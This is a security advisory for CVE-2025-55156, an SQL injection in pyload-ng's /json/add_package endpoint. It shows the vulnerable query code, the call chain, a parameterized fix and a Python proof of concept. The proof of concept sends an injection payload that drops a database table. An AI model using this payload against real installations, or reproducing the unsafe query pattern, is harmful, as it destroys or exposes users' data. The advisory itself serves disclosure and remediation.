logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-55156 pyload-ng

Package

Manager: pip
Name: pyload-ng
Vulnerable Version: >=0 <0.5.0b3.dev91

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:U/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

EPSS: 0.00038 pctl0.10137

Details

PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter ### Summary The parameter `add_links` in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage. ### Details - Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271 - Affected code: ```python @style.queue def update_link_info(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, ) ids = [] statuses = "','".join(x[3] for x in data) self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')") for r in self.c: ids.append(int(r[0])) return ids ```` statuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because `{statuses}` is directly spliced into the SQL statement, it leads to the SQL injection vulnerability. - Vulnerability Chain ```xml josn_blueprint.py#add_package src/pyload/core/api/__init__.py#add_package src/pyload/core/managers/file_manager.py#add_links src/pyload/core/threads/info_thread.py#run src/pyload/core/threads/info_thread.py#update_info src/pyload/core/managers/file_manager.py#update_file_info src/pyload/core/database/file_database.py#update_link_info ``` ### PoC ```python import requests if __name__ == "__main__": url = "http://localhost:8000/json/add_package" data = { "add_name": "My Downloads1", "add_dest": "0", "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--", "add_password": "mypassword" } response = requests.post(url, cookies=your_cookies, data=data) print(response.status_code, response.text) ``` <img width="1599" height="827" alt="image" src="https://github.com/user-attachments/assets/9bdcef37-59b8-4e60-a2b5-beb8a88c3202" /> ### Remediation ```python def update_link_info(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, ) # 提取所有url urls = [x[3] for x in data] # 构建参数化查询,避免SQL注入 placeholders = ','.join(['?'] * len(urls)) query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)" self.c.execute(query, urls) ids = [int(row[0]) for row in self.c.fetchall()] return ids ``` ### Impact Attackers can modify or delete data in the database, causing data errors or loss.

Metadata

Created: 2025-08-12T00:13:46Z
Modified: 2025-08-12T13:16:38Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-pwh4-6r3m-j2rf/GHSA-pwh4-6r3m-j2rf.json
CWE IDs: ["CWE-89"]
Alternative ID: GHSA-pwh4-6r3m-j2rf
Finding: F297
Auto approve: 1